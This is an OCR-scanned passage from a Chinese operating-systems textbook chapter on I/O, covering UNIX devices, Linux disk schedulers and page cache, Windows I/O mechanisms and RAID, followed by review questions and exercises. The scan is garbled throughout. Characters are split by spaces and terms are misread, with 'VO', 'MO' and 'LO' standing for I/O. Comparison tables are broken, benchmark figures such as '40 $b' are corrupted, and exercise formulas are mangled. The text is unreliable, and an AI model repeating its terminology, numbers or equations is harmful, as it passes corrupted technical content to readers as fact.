11.8.4 UNIX 设备 


UNIX 识别 五 种 类 型 的 设备 包括 : 磁盘 驱动 器 、 磁 带 驱 动 器 、 终 端 、 通 信 线 路 、 打 印 机 。 

表 11.5 显示 了 适合 于 每 类 设备 的 MO 类 型 。 磁盘 驱动 器 在 UNIX 中 使 用 很 广泛 ， 它 是 面向 
块 的 设备 , 并且 有 可 能 达到 很 高 的 吞吐 量 。 因 此 ， 这 类 设备 倾向 于 使 用 无 缓冲 的 IO 或 者 通过 组 
冲 区 高 速 缓存 的 IO。 磁带 驱动 器 的 功能 与 磁盘 驱动 器 类 似 ， 因 而 也 使 用 类 似 的 Ia 方案 。 


表 11.5 UNIX 中 的 设备 VO 
经 冲 区 高 速 组 丰 
x | | 


由 于 终端 包含 相对 比较 慢 的 字符 交换 ,终端 IO 通常 使 用 字符 队列 。 类 似 地 ， 通 信和 线程 需要 
为 输入 或 输出 串 行 处 理 数据 字 节 ,因此 最 好 使 用 字符 队列 处 理 。 最 后 ， 用 于 打印 机 的 WO 类 型 通 
常 取决 于 打印 机 的 速度 。 低 速 打印 机 通常 使 用 字符 队列 ， 而 高 速 打印 机 可 以 采用 无 缓冲 的 IO。 
缓冲 区 高 速 缓存 也 可 以 用 于 高 速 打 印 机 , 但 是 , 由 于 送 到 打印 机 的 数据 永远 不 会 再 使 用 , 因此 组 
冲 区 高 速 缓存 的 开销 是 没有 必要 的 。 


11.9 Linux I/O 


BS, Linux /O 核心 机 制 的 实现 与 其 他 UNIX 的 IO 非常 相似 ， 例 如 SRV4. Linux 内 核 将 
每 个 IO 设备 驱动 都 关联 到 一 个 特殊 文件 。 在 Linux 中 可 以 识别 块 设备 、 字 符 设备 和 网 络 设备 。 
本 节 将 介绍 Linux IO 机 制 的 一 些 特 点 。 







字符 队列 







通信 线路 





Windows 和 Linux 的 比较 : W/O 









Windows 
LO 系统 是 分 层 的 ， 通 过 LO 请 求 包 来 表示 每 个 请 求 ， 
然后 通过 各 层 驱动 程序 ( 一 个 数据 驱动 的 体系 结构 ) 来 
传递 这 些 请 求 。 各 层 驱 动 程序 可 以 扩展 功能 ,例如 检查 
文件 数据 以 查找 病毒 , 或 者 增加 特殊 加 密 或 压缩 等 特性 
VO 是 天 然 异 步 的 ， 因 为 任何 一 层 驱 动 程序 都 可 以 将 
VO 请 求 排队 ， 用 于 以 后 处 理 ， 然 后 再 返回 给 调用 者 









VO 使 用 一 种 插件 模型 ， 基 于 例 程 表 来 实现 标准 设备 功 


能 一 一 如 open, read, write. ioctl 和 close 










在 当前 版 本 的 Linux 中 只 有 网 络 VO 和 绕 过 页 面 缓存 的 
直接 MO 可 以 是 异步 的 
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( #8 ) 
Windows 和 Linux 的 比较 : MO 
Windows Linux 
驱动 程序 可 以 动态 加 载 /卸载 驱动 程序 可 以 动态 加 载 /卸载 
VO 设备 在 文件 系统 中 命名 ; 通过 设备 实例 进行 访问 驱 


IO 设备 和 驱动 程序 在 系统 名 字 空 间 中 命名 动 程序 
通过 总 线 枚 举 功 能 、 从 数据 库 中 匹配 驱动 程序 ,以 及 
动态 加 载 / 务 载 等 动态 设备 检测 技术 支持 高 级 即 插 即 用 有 限 支持 即 插 即 用 
功能 


先进 的 电源 管理 ， 包 括 CPU 时 钟 频率 管理 、 睡 眠 状 
态 和 系统 休眠 管理 有 限 的 基于 CPU 时 钟 频率 管理 的 电源 管理 


IO 根据 线程 优先 级 和 系统 需求 来 确定 优先 级 ， 这 些 提供 四 种 不 同 版 本 的 VO 调度 程序 ,包括 基于 最 后 期 限 
系统 需求 包括 当 内 存 低 时 分 页 系统 为 高 优先 级 访问 , 以 | 调度 程序 和 在 所 有 进程 中 公平 分 配 VO 的 完全 公平 队列 
及 磁盘 碎片 整理 的 后 台 活 动 为 空闲 优先 级 ( Complete Fairness Queuing ) 调度 程序 

VO 完成 端口 给 高 性 能 、 多 线程 应 用 程序 提供 一 个 处 
理 异步 VO 的 有 效 方式 


11.9.1 磁盘 调度 


在 Linux 2.4 中 , 默认 的 磁盘 调度 算法 是 Linus 电梯 (Linus Elevator) 调度 程序 , 它 是 在 11.5 
节 中 介绍 的 LOOK 算法 的 一 种 变 体 。 而 在 Linux 2.6 中 ， 除 电梯 算法 外 还 额外 增加 了 两 种 算法 : 
最 后 期 限 VO 调度 程序 ( deadline 1/O scheduler ) 和 预期 VO 调度 程序 (anticipatory IO scheduler ) 
[LOVE04]。 下 面 将 依次 进行 介绍 。 
电梯 调度 程序 

电梯 调度 程序 为 磁盘 读 写 请 求 保持 一 个 队列 , 并 且 在 该 队列 上 执行 排序 和 合并 功能 。 一 般 说 
来 , 电梯 调度 程序 通过 块 号 对 请 求 队 列 进行 排序 。 因 而 ， 当 磁盘 请 求 被 处 理 的 时 候 , 磁盘 驱动 器 
向 一 个 方向 移动 ,以 满足 其 在 该 方向 上 过 到 的 每 个 请 求 。 这 种 策略 可 以 按照 如 下 的 方式 进行 改进 。 
在 一 个 新 的 请 求 添加 到 队列 中 时 ,会 依次 考虑 四 个 操作 : 

1) 如 果 新 的 请 求 与 队列 中 等 待 的 请 求 的 数据 处 于 同一 磁盘 遍 区 或 者 直接 相 邻 的 扇 区 ， 那 么 

现 有 的 请 求 和 新 的 请 求 可 以 合并 成 一 个 请 求 。 

2) 如 果 队 列 中 的 一 个 请 求 已 经 存在 很 长 时 间 了 ， 新 的 请 求 将 被 插 和 人 到 队列 的 尾部 。 

3 ) 如 果 存 在 合适 的 位 置 ， 新 的 请 求 将 被 按 顺 序 插 人 到 队列 中 。 

4) 如 果 没 有 合适 的 位 置 ， 新 的 请 求 将 被 插入 到 队列 的 尾部 。 


最 后 期 限 调度 程序 

上 面 处 理 列 表 中 的 第 二 个 操作 是 为 了 防止 请 求 长 时 间 得 不 到 满足 ， 但 是 这 并 不 十 分 有 效 
[LOVE04]。 因 为 该 方式 并 没有 试图 为 服务 请 求 提 供 一 个 最 后 期 限 ， 只 是 在 一 个 合理 延迟 后 停止 
揪 入 排序 的 请 求 。 电 梯 调 度 程 序 表现 出 两 个 方面 的 问题 。 第 一 个 问题 是 , 由 于 队列 动态 更 新 的 原 
因 ， 一 个 相距 较 远 的 请 求 可 能 会 延 信 相 当 长 的 时 间 。 例 如 ， 考 虑 下 面 的 磁盘 块 请 求 序 列 为 20, 
30，700，25。 电 梯 调 度 程 序 会 重新 排序 ,顺序 为 20，25，30，700， 其 中 20 放 到 了 队列 的 开头 。 
如 果 不 断 地 有 低 块 号 的 请 求 序列 到 达 ， 那 么 对 700 块 的 请 求 将 一 直 被 延迟 。 

考虑 到 读 和 写 请 求 的 不 同 , 还 有 一 个 更 严重 的 问题 。 典 型 地 ,一 个 写 请 求 是 异步 的 。 也 就 是 
说 , 一旦 进程 发 出 了 写 请 求 , 其 不 必 等 待 该 请 求 被 实际 执行 。 当 一 个 应 用 程序 发 出 了 一 个 写 请 求 ， 
内 核 将 数据 复制 到 一 个 合适 的 缓冲 区 , 在 时 间 允 许 的 时 候 写 出 去 。 一 旦 数据 放 到 了 内 核 的 缓冲 区 
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中 ,应 用 程序 可 以 继续 进行 。 然 而 ， 对 于 很 多 读 操作 来 说 ,进程 必须 等 待 ， 直 到 所 请 求 的 数据 在 
应 用 程序 运行 前 发 送 给 应 用 程序 。 这样 一 个 写 请 求 的 流 ( 如 向 磁盘 上 写 一 个 大 文件 ) 可 以 阻塞 一 
个 读 请 求 很 长 时 间 ， 从 而 阻塞 进程 。 

为 了 克服 这 些 问 题 , 最 后 期 限 调度 程序 使 用 了 三 个 队列 ( 见 图 11.14) 每 个 新 来 的 请 求 被 放 
置 到 排序 的 电梯 队列 中 ,这些 队列 与 前 面 所 述 一 致 。 此 外 ,同样 的 请 求 还 被 放置 在 一 个 FIFO 的 
读 队列 〈 如 果 该 请 求 是 读 请 求 ) 或 一 个 FIFO 的 写 队 列 ( 如 果 该 请 求 是 写 请 求 )。 这 样 ， 读 和 写 
队列 维护 了 一 个 按照 请 求 发 生 时 间 为 顺序 的 请 求 列表 。 对 每 个 请 求 都 有 一 个 到 期 时 间 , 对 于 读 请 
求 默认 值 为 0.5 秒 ， 对 于 写 请 求 默认 值 为 5 秒 。 通 常 ， 调 度 程序 从 排序 队列 中 分 派 服务 。 当 一 个 
请 求 得 到 满足 时 , 它 将 从 排序 队列 的 头 部 移 走 , 同时 也 从 对 应 的 FIFO 队列 移 走 。 然 而 ， 当 FIFO 
队列 头 部 的 请 求 项 超过 其 到 期 时 间 时 , 调度 程序 将 从 该 FIFO 队列 中 派 遗 任务 , 取出 到 期 的 请 求 ， 
再 加 上 接 下 来 的 几 个 队列 中 的 请 求 。 当 任何 一 个 请 求 被 服务 时 ， 它 也 从 排序 队列 中 移出 。 

最 后 期 限 IO 调度 程序 方式 克服 了 “ 饥 俄 ”问题 和 读 写 不 一 致 的 问题 。 


排序 的 《电梯 ) 队列 





图 11.14 Linux 最 后 期 限 LO 调度 程序 


预期 MO 调度 程序 

最 初 的 电梯 调度 程序 和 最 后 期 限 调度 程序 都 是 用 来 在 现 有 的 请 求 得 到 满足 的 情况 下 ,调度 新 
的 请 求 ， 因而 可 以 尽量 保持 磁盘 的 运转 。 同 样 的 策略 也 适用 于 11.5 节 中 介绍 的 调度 算法 。 然而 ， 
当 存在 很 多 同步 读 请 求 时 ， 这 一 策略 可 能 不 能 达到 预期 效果 。 典 型 地 ， 一 个 应 用 程序 会 在 一 个 
读 请 求 得 到 满足 并 且 数 据 可 用 之 后 , 才 会 发 出 下 一 个 读 请 求 。 在 接受 上 次 读 请 求 的 数据 和 发 出 
下 一 次 读 请 求 之 间 有 个 很 小 的 延迟 ， 利 用 这 个 延迟 ， 调 度 程 序 可 以 转向 其 他 等 待 的 请 求 ， 并 服 
务 该 请 求 。 

由 于 局 部 性 原理 , 相同 进程 的 连续 读 请 求 会 发 生 在 相 邻 的 磁盘 块 上 。 如 果 调 度 程 序 在 满足 一 
个 读 请 求 后 能 延迟 一 小 段 时 间 , 看 看 是 否 有 新 的 附件 的 读 请 求 发 生 , 这 样 可 以 增强 整个 系统 的 性 
能 。 这 就 是 预期 调度 程序 背后 的 原理 ， 它 在 [IYER01] 中 提出 ， 并 在 Linux 2.6 中 实现 。 

在 Linux 中 ,预期 调度 程序 是 对 最 后 期 限 调度 程序 的 补充 。 当 一 个 读 请 求 被 分 派 时 ,预期 调 
度 程序 会 将 调度 系统 的 执行 延迟 6 毫秒 ， 具 体 的 延迟 时 间 取 决 于 配置 文件 。 在 这 一 小 段 延迟 中 ， 
发 出 上 一 条 读 请 求 的 应 用 程序 有 机 会 发 出 另 一 条 读 请 求 , 并 且 该 请 求 发 生 在 相同 的 磁盘 区 域 。 如 
果 是 这 样 , 新 的 请 求 会 立刻 享受 服务 。 如 果 没 有 新 的 请 求 发 生 ， 调度 程序 继续 使 用 最 后 期 限 调度 
算法 。 

LOVET Linux 上 调度 算法 的 两 个 测试 。 第 一 个 测试 包含 了 读 取 一 个 200MB 的 文件 ， 
同时 后 台 进 行 一 个 长 的 写 文件 流 。 第 二 个 测试 包括 在 后 台 读 一 个 大 的 文件 ， RRA Rm RE 
树 目录 中 的 每 个 文件 。 结 果 如 下 表 所 示 。 

可 以 看 出 , 性 能 的 提升 取决 于 工作 负载 的 性 质 。 但 是 在 两 个 测试 中 ， ORI TB 
著 的 性 能 提升 。 
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VO 调度 程序 和 内 核 测试 1 ”测试 2 
Linux 2.4 上 的 Linus 电梯 调度 程序 45 秒 30 4 28 
Linux 2.6 上 的 最 后 期 限 IO 调度 程序 40 $b 3 分 30 秒 
Linux 2.6 上 的 预期 VO 调度 程序 4.6 秒 15 秒 


11.9.2 Linux 页 面 缓存 


在 Linux 2.2 和 较 旱 的 版 本 中 ,内核 维护 一 个 页 面 缓存 ， 以 缓存 从 普通 文件 系统 中 的 读 写 ,或 
者 缓存 虚拟 内 存 的 页 面 ; 内核 还 维护 了 一 个 单独 的 缓冲 区 高 速 缓存 ， 以 用 于 块 的 输入 /输出 。 对 于 
Linux 2.4 和 后 面 的 版 本 ， 其 使 用 同样 的 页 面 高 速 缓存 ， 涉 及 所 有 的 磁盘 和 内 存 间 的 数据 交换 。 

页 面 缓存 有 两 个 优势 。 第 一 ， 当 需要 将 “ 脏 ” 页 面 写 回 到 磁盘 时 ， 这 些 “ 脏 "页面 可 以 适当 
地 排序 ,从 而 高 效 地 写 回 。 第 二 ,由 于 局 部 性 原理 的 存在 ,在 页 面 缓 存 中 的 页 面 从 缓存 中 清除 之 
前 ， 很 有 可 能 被 再 次 引用 ， 因 此 避免 了 不 必要 的 磁盘 IO 操作 。 

“ 脏 ” 页 面 在 两 种 情况 下 被 写 回 : 

@ 当空 闲 内 存 低 于 一 个 指定 的 域 值 时 , 内 核 会 减少 页 面 缓存 的 大 小 来 释放 其 所 占用 的 内 存 ， 

并 将 其 加 入 到 空闲 内 存 中 。 
o 当 “ 脏 ”页 面 驻 留 的 时 间 高 于 指定 的 域 信 时 ， 这 些 “ 脏 ”页 面 将 被 写 回 到 磁盘 。 


11.10 Windows I/O 


图 11.15 显示 了 与 Windows VO 管理 器 相关 的 关键 内 核 组 件 。LO 管理 器 负责 为 操作 系统 处 
理 所 有 IO ， 并 提供 所 有 类 型 的 驱动 程序 都 能 够 调用 的 统一 接口 。 


11.10.1 基本 MO 机 制 


IO 管理 器 与 四 种 类 型 的 内 核 组 件 紧密 地 协同 工作 ， 

© 高 速 缓存 管理 器 : 高 速 缓存 管 理 器 为 所 有 的 文件 系统 处 理 
文件 缓存 。 当 可 用 的 物理 内 存 变化 时 ， 它 可 以 动态 地 增加 
和 减少 某 个 特定 文件 的 高 速 缓 存 的 大 小 。 系 统 仅仅 在 高 速 
缓存 中 记录 更 新 ， 而 不 在 磁盘 中 记录 。 一 个 惰性 内 核 写 线 
程 ， 周 期 性 地 将 系统 更 新 批量 写 入 磁盘 中 。 批 处 理 方式 的 
写 回 更 新 可 以 使 VO 系统 效率 更 高 。 文 件 块 区 域 被 映射 到 
内 核 的 虚拟 内 存 中 ， 然 后 由 虚拟 内 存 管理 器 来 完成 复制 页 
面 到 磁盘 上 的 文件 中 或 从 文件 中 复制 页 面 的 大 部 分 工作 。 
高 速 缓 存 管理 器 就 是 通过 这 种 方式 来 工作 的 。 

o 文件 系统 驱动 程序 : IO 管理 器 将 文件 系统 驱动 程序 仅仅 看 做 是 另 一 个 设备 驱动 程序 , 并 
把 关于 文件 系统 中 某 些 卷 的 VO 请 求 发 送 给 与 这 些 卷 相应 的 软件 驱动 程序 。 文 件 系统 依 
次 给 管理 硬件 设备 适配器 的 软件 驱动 程序 发 送 1/O 请 求 。 

o 网 络 驱动 程序 ，Windows 包括 完整 的 联网 能 力 ， 并 支持 远程 文件 系统 。 这 些 机 制 的 实现 
是 由 软件 驱动 程序 实现 的 ， 而 不 是 由 Windows 执行 体 ( Windows Executive ) 的 一 部 分 来 
实现 的 。 

© 硬件 设备 驱动 程序 ， 这 些 软件 驱动 程序 通过 内 核 硬件 抽象 层 中 的 入 口 点 ， 访 问 外 围 设备 
的 硬件 寄存 器 。 这 些 例 程 存 在 于 Windows 所 支持 的 每 种 平台 上 ， 由 和 卑 所 有 平台 的 例 程 名 
都 是 相同 的 ， 因 而 Windows 设备 驱动 程序 的 源 代码 可 以 在 不 同 的 处 理 器 类 型 间 移 植 。 





图 11.15 Windows IO 管理 器 


#1 VO FEP AHE 361 





11.10.2 ”异步 VO 和 同步 VO 


Windows 提供 两 种 模式 的 1/O 操作 : 异步 和 同步 。 异 步 模式 用 于 优化 应 用 程序 的 性 能 。 通 过 
异步 TO， 应 用 程序 可 以 启动 一 个 IO 操作 ， 然 后 在 WO 请 求 执行 的 同时 继续 处 理 。 而 对 于 同步 
IO， 应 用 程序 被 阻塞 直到 IO 操作 完成 。 

从 调用 线程 的 角度 看 ， 异 步 VO 更 有 效 一 些 ， 这 是 因为 它 在 VO 管理 器 对 IO 操作 进行 排队 
并 随后 进行 处 理 的 同时 ,允许 线程 继续 执行 。 但 是 调用 异步 WO 操作 的 应 用 程序 需要 通过 某 种 方 
式 来 确定 IO 操作 何 时 完成 。Windows 提供 了 四 种 不 同 的 技术 用 于 在 IO 完成 时 发 信号 : 

@ 给 一 个 文件 对 象 发 信号 : 通过 这 种 方法 ， 当 在 某 个 设备 对 象 上 的 操作 完成 时 ， 与 该 设备 

对 象 相关 联 的 一 个 指示 器 被 置 位 。 请 求 该 VO 操作 的 线程 可 以 继续 执行 ， 直 到 它 到 达 某 
一 时 刻 必须 等 待 TO 的 操作 完成 。 在 这 一 时 刻 ， 线 程 开 始 等 待 直到 该 操作 完成 ， 然 后 再 
继续 。 这 种 技术 简单 ， 且 易于 使 用 ， 但 不 适合 处 理 多 个 LO 请 求 。 例 如 ， 如 果 一 个 线程 
需要 在 一 个 文件 上 同时 执行 多 个 动作 ， 如 从 文件 的 一 部 分 读 并 向 文件 的 另 一 部 分 写 ， 若 
使 用 这 种 技术 ， 该 线程 将 无 法 区 分 是 读 操 作 完 成 还 是 写 操作 完成 ， 它 仅仅 知道 在 这 个 文 
件 中 请 求 的 某 个 IO 操作 完成 了 。 

@ 给 一 个 事件 对 象 发 信号 : 这 种 技术 允许 在 一 个 设备 或 文件 中 同时 有 多 个 VO 请 求 。 该 线 
程 为 每 个 请 求 创建 一 个 事件 ， 随 后 ， 该 线程 可 以 在 这 些 请 求 中 的 一 个 上 或 所 有 请 求 的 集 
合 上 等 待 。 

@ 异步 过 程 调用 : 这 种 技术 利用 与 线程 相关 联 的 一 个 队列 ， 称 做 异步 过 程 调用 
( Asynchronous Procedure Call, APC) 队列 。 在 这 种 情况 下 ， 该 线程 产生 IO 请 求 ， 指 定 
一 个 用 户 态 的 例 程 ， 当 LO 完成 后 来 回调 它 。LO 管理 器 把 这 些 请 求 的 结果 放 在 调用 线程 
的 APC 队列 中 。 当 这 个 线程 再 次 被 内 核 阻 塞 时 ， 这 些 异 步 过 程 调用 (APC) 会 被 发 送出 
去 。 每 一 个 异步 过 程 调用 都 会 使 线程 返回 到 用 户 态 并 且 执行 指定 的 例 程 。 

@ 1/0 完成 端口 : Windows 服务 器 使 用 这 种 技术 来 优化 线程 的 使 用 。 应 用 程序 创建 一 个 线程 池 
来 处 理 VO 请 求 的 完成 。 每 个 线程 都 在 完成 的 端口 上 等 待 ，LO 端口 完成 后 ， 内 核 唤醒 线程 
来 继续 进行 相应 处 理 。 这 种 方法 的 一 个 优点 是 应 用 程序 可 以 限定 一 次 执行 多 少 个 线程 。 

@ 轮 询 (Polling): 异步 IO 请 求 会 在 操作 完成 时 向 进程 用 户 的 虚拟 内 存 中 写 人 状态 和 传递 

数据 的 计数 。 一 个 线程 仅仅 检查 一 下 这 些 值 就 可 以 知道 操作 是 否 已 经 完成 。 


11.10.3 软件 RAID 


Windows 支持 两 类 RAID MWE, [ MS96 ] 中 给 出 了 关于 它们 的 定义 : 

@ 硬件 RAID: 独立 物理 磁盘 通过 磁盘 控制 器 或 磁盘 存储 柜 , 被 组 合成 一 个 或 多 个 逻辑 磁盘 。 

@ 软件 RAID; 不 连续 的 磁盘 空间 通过 容错 软件 磁盘 驱动 程序 FIDISK, 组 合成 一 个 或 多 个 
逻辑 分 区 。 
在 硬件 RAID 中 ， 控 制 器 接口 处 理 元 余 信 息 的 创建 和 重新 生成 。Windows 服务 器 上 的 软 
fF RAID, 作为 操作 系统 的 一 部 分 实现 了 RAID 的 功能 性 , 并 且 可 以 和 任意 的 多 个 磁盘 集 
合 一 同 使 用 。 软 件 RAID 机 制 实现 了 RAID 1 A RAID 5。 在 RAID 1 的 情况 中 (磁盘 镜 
B) 包括 主要 分 区 和 镜像 分 区 的 两 个 磁盘 可 以 在 同一 个 磁盘 控制 器 上 , 也 可 以 在 不 同 的 
磁盘 控制 器 上 。 后 一 种 配置 称 做 磁盘 双 工 。 


11.10.4 KEH 
影子 复制 是 一 种 高 效 的 备份 方法 , 通过 生成 卷 的 连续 快照 来 进行 备份 。 影子 复制 对 于 在 每 个 


362 RAED WO XH 





卷 上 进行 文件 存档 也 很 有 用 。 如 果 用 户 删除 了 一 个 文件 , 他 或 她 可 以 从 可 用 的 影子 副本 上 来 获得 
该 文件 一 个 较 早 的 副本 , 其 中 影子 副本 由 系统 管理 员 生成 。 影 子 复制 由 软件 驱动 程序 来 完成 , 在 
卷 上 的 数据 被 覆盖 之 前 生成 其 备份 。 


11.105 me 


从 Windows Vista 开始 ,操作 系统 开始 支持 整 卷 加 密 。 这 样 比 对 单个 的 文件 加 密 更 安全 ， 因 为 
整个 系统 协同 工作 来 保证 数据 安全 。 已 支持 三 种 不 同 的 生成 密 钥 的 方法 ; 允许 多 层次 的 安全 联 锁 。 


11.11 小 结 


计算 机 系统 和 外 部 世界 的 接口 是 它 的 IO 体系 结构 。LIO 体系 结构 的 设计 目标 是 提供 一 种 系 
统 化 方法 来 控制 与 外 部 世界 的 交互 ， 并 且 给 操作 系统 提供 有 效 管理 IO 所 需要 的 信息 。 

IO 功能 通常 划分 成 许多 层 ， 比 较 低 的 层 处 理 与 要 执行 的 物理 功能 比较 接近 的 细节 ， 比 较 高 
的 层 以 一 种 逻辑 和 通用 的 方式 处 理 LO。 其 结果 是 硬件 参数 的 变化 不 需要 影响 大 多 数 VO 软件 。 

IO 的 一 个 重要 方面 是 使 用 缓冲 区 ,缓冲 区 由 1/O 实用 程序 控制 , 而 不 是 由 应 用 程序 进程 控制 。 
缓冲 可 以 平滑 计算 机 系统 内 部 速度 和 LO 设备 速度 之 间 的 差异 。 使 用 缓冲 区 还 把 实际 的 WO 传送 从 
应 用 程序 进程 的 地 址 空间 分 离 出 来 ,这 就 使 得 操作 系统 能 够 更 加 灵活 地 执行 它 的 存储 器 管理 功能 。 

对 整个 系统 性 能 产生 重要 影响 的 是 磁盘 UO ， 因 而 关于 这 个 领域 的 研究 和 设计 工作 远 远 超过 
了 其 他 任何 一 种 类 型 的 VO。 为 提高 磁盘 IO 的 性 能 ， 使 用 最 广泛 的 两 种 方法 是 磁盘 调度 和 磁盘 
高 速 缓存 。 

在 任何 时 候 ， 总 是 有 一 个 关于 同一 个 磁盘 上 的 IO 请 求 的 队列 ,这 正 是 磁盘 调度 的 对 象 ， 磁 
盘 调 度 的 目的 是 按 某 种 方式 满足 这 些 请 求 , 并 使 得 磁盘 的 机 械 寻 道 时 间 最 小 ,从 而 提高 性 能 。 那 
些 被 挂 起 请 求 的 物理 布局 和 对 局 部 性 的 考虑 在 调度 中 起 着 主要 作用 。 

磁盘 高 速 缓存 是 一 个 缓冲 区 , 通常 保存 在 内 存 中 , 充当 磁盘 块 在 位 盘 存储 器 和 其 余 内 存 之 间 
的 高 速 缓 存 。 由 于 局 部 性 原理 ， 磁 盘 高 速 缓存 的 使 用 可 以 充分 地 减少 内 存 和 磁盘 之 间 IO 传送 的 
块 数 。 


11.12 推荐 读物 


在 大 多 数 计算 机 体系 结构 方面 的 书籍 中 ， 都 可 以 找到 关于 计算 机 VO 的 一 般 介 绍 ， 如 [ STAL06 ]。 
[ MEE96a ] 综述 了 磁盘 和 磁带 系统 的 底层 记录 技术 ; [ MEE96b ] 重点 讲述 了 磁盘 和 磁带 系统 中 的 数据 存储 
技术 。[ WIED87 ] 中 有 关于 磁盘 性 能 问题 ( 包括 那些 与 磁盘 调度 相关 的 问题 ) 的 一 个 很 好 的 讨论 ; [ NG98 ] 
讲述 了 磁盘 硬件 性 能 问题 ; [ CAO96 ] 分 析 了 磁盘 高 速 缓存 和 磁盘 调度 ; [WORT94] 和 [SELT90] 对 调度 算法 
进行 了 很 好 的 概括 ， 并 进行 了 性 能 分 析 。 

[ ROSCO3 ] 给 出 了 关于 各 种 类 型 的 外 部 存储 器 系统 的 综述 ， 并 对 每 种 系统 都 给 出 了 适当 的 技术 细节 ; 
[SCHW96 ] 也 给 出 了 一 个 很 好 的 综述 ， 它 的 重点 是 VO 接口 ， 而 不 是 设备 本 身 ; [ PAI00 ] 给 出 了 关于 IO 
缓冲 和 高 速 缓存 的 综合 的 操作 系统 方案 。 

[ DELL00 ] 详细 讲述 了 Windows NT 的 设备 驱动 程序 ， 并 综述 了 整个 Windows IO 体系 结构 。 

[ CHENS4 | 是 由 RAID 概念 的 提出 者 撰写 的 ， 这 是 关于 RAID 技术 的 一 个 非常 好 的 综述 。[ CHEN96 ] 
分 析 了 RAID 的 性 能 ; [ FRIE96 ] 也 是 一 篇 不 错 的 论文 ; [ DALT96 ] 详细 描述 了 Windows NT 的 软件 RAID 
机 制 。 
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11.13 关键 术语 、 复 习题 和 习题 
关键 术语 
块 磁盘 组 固定 磁盘 
面向 块 的 设备 HELKA 可 编程 TO 
循环 缓冲 区 软盘 读 / 写 头 
CD-R 间隙 独立 磁盘 元 余 阵 列 ( RAID ) 
CD-ROM 硬盘 CD-RW 
中 断 驱动 IO 可 换 式 磁盘 柱 面 
输入 /输出 (IO ) 旋转 延迟 设备 VO 
VO 缓冲 区 ia 数字 化 视频 光盘 (DVD) 
LO 通道 寻 道 时 间 直接 存储 器 访问 (DMA ) 
VO 处 理 器 面向 流 的 设备 磁盘 存 取 时 间 
逻辑 IO 磁道 磁盘 高 速 缓存 
磁盘 传送 时 间 活动 头 磁盘 
复习 题 


11.1 
11.2 
11.3 
11.4 
11.5 
11.6 
11.7 


列 出 并 简单 定义 执行 VO 的 三 种 技术 。 

逻辑 WO 和 设备 TO 有 什么 区 别 ? 

面向 块 的 设备 和 面向 流 的 设备 有 什么 区 别 ? 各 举 一 些 例子 。 
为 什么 希望 用 双 缓 冲 而 不 是 单 缓冲 来 提高 MO 的 性 能 ? 

在 磁盘 读 或 写 时 有 哪些 延迟 因素 ? 

简单 定义 图 11.7 中 描述 的 磁盘 调度 策略 。 

简单 定义 7 个 RAID 级 别 。 
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习题 


11.1 


11.2 


11.3 


11.4 


11.5 


11.6 


11.7 


11.8 


11.9 


11.10 


考虑 一 个 程序 访问 一 个 WO 设备 ， 并 比较 无 缓冲 的 VO 和 使 用 缓冲 区 的 UO。 说 明 使 用 缓冲 区 最 多 可 

以 减少 2 倍 的 运行 时 间 。 

思考 下 面 的 问题 ， 你 会 注意 到 本 章 讨 论 的 磁盘 调度 算法 中 存在 一 些 “ 边 界 情况 ”需要 考虑 。 

a) 设计 并 描述 一 组 寻 道 请 求 序列 ， 使 得 下 述 磁盘 调度 算法 产生 相同 (或 相似 ) 的 执行 效率 : FCFS, 
SSTF、 随 机 算法 、SCAN ( 使 用 LOOK )。 

b) 设计 并 描述 一 个 寻 道 请 求 序列 ， 使 得 SCAN 和 C-SCAN (使 用 LOOK ) 算法 产生 相同 (或 相似 ) 
的 执行 效率 。 

a) 使 用 与 表 11.2 类 似 的 方式 , 分 析 下 列 磁道 请 求 序列 : 27，129，110，186，147，41，10，64，120。 
假设 磁头 最 初 定位 在 磁道 100 处 、 并 且 沿 着 磁道 号 减 小 的 方向 移动 。 

b) 如 果 假 设 磁头 沿 着 磁道 号 增 大 的 方向 移动 ， 请 给 出 同样 的 分 析 。 

考虑 一 个 磁盘 ， 有 N 个 磁道 ， 磁 道 号 从 0 到 (N1), 并 且 假 设 请 求 的 怖 区 随机 地 均匀 分 布 在 磁盘 

上 。 现 在 要 计算 一 次 寻 道 平均 跨越 的 磁道 数 。 

a) 首先 ， 计算 当 磁头 位 于 磁道 + 时 ， 寻 道 长 度 为 /的 可 能 性 。( 提示 : 这 是 一 个 关于 确定 所 有 组 合 数 
目的 问题 ， 所 有 磁道 位 置 作 为 寻 道 目标 的 可 能 性 是 相等 的 。) 

b) 接 下 来 计算 寻 道 长 度 为 天 的 可 能 性 。( 提示 : 这 包括 所 有 移动 了 天 个 磁道 的 可 能 性 之 和 。) 

c) 使 用 下 面 计 算 期 望 值 的 公式 ， 计 算 一 次 寻 道 平均 跨越 的 磁道 数目 ， 


N-1 


E[x] =} i>’ Pr[x=/] 


i=0 

— n. o n(n+D Gi. n(n+l(2n+1) 
提示 ; 使 用 Li ;2 = 
d) 说 明 当 WN 比较 大 时 ， 一 次 寻 道 平均 跨越 的 磁道 数 接近 N/3。 
下 面 的 公式 适用 于 高 速 缓存 存储 器 和 磁盘 高 速 缓存 ， 

Ts=TctM x-Tp 

请 把 这 个 公式 推广 到 N 级 存储 器 结构 ， 而 不 是 仅仅 2 级 。 
对 基于 频率 的 置换 算法 ( 见 图 11.9), FEM Foew、Fmiadie 和 Fo 分 别 为 包含 新 区 、 中 间 区 和 老区 的 高 
速 缓存 片断 ， 显 然 Foew 十 Fmiaale 十 Fols 二 1。 如 果 有 
a) Foa=1—Faew 
b) Fou=1/ ( 商 速 缓存 大 小 ) 
请 分 别 描述 该 策略 。 
如 果 磁 盘 中 局 区 大 小 固定 为 每 扇 区 512 字 节 ， 并 且 每 磁道 128 SK, 130 个 磁道 ,一 共有 12 
个 可 用 的 面 ， 计 算 存 储 90000 条 200 比特 长 的 逻辑 记录 需要 多 少 磁盘 空间 (NR. BRA). BH 
文件 头 记 录 和 磁道 索引 ， 并 假设 记录 不 能 跨越 两 个 扇 区 。 
考虑 11.7 中 提 到 的 磁盘 系统 。 假 设 磁 盘 转 速 是 1200 转 /分 ， 磁 盘 控 制 器 每 旋转 一 圈 可 以 将 一 个 肩 区 
读 和 其 内 部 缓冲 区 ， 接 着 操作 系统 以 字 节 为 单位 读 取 这 些 数据 ， 每 读 取 一 个 字 节 ， 磁 盘 控 制 器 都 会 
产生 一 个 中 断 。 
a) 如 果 中 断 服 务 例 程 处 理 每 个 中 断 的 时 间 是 1.8 微 秒 ， 那 么 系统 读 人 整个 启 区 需要 花 多 少时 间 ? (不 

考虑 寻 道 所 需要 花费 的 时 间 ) 
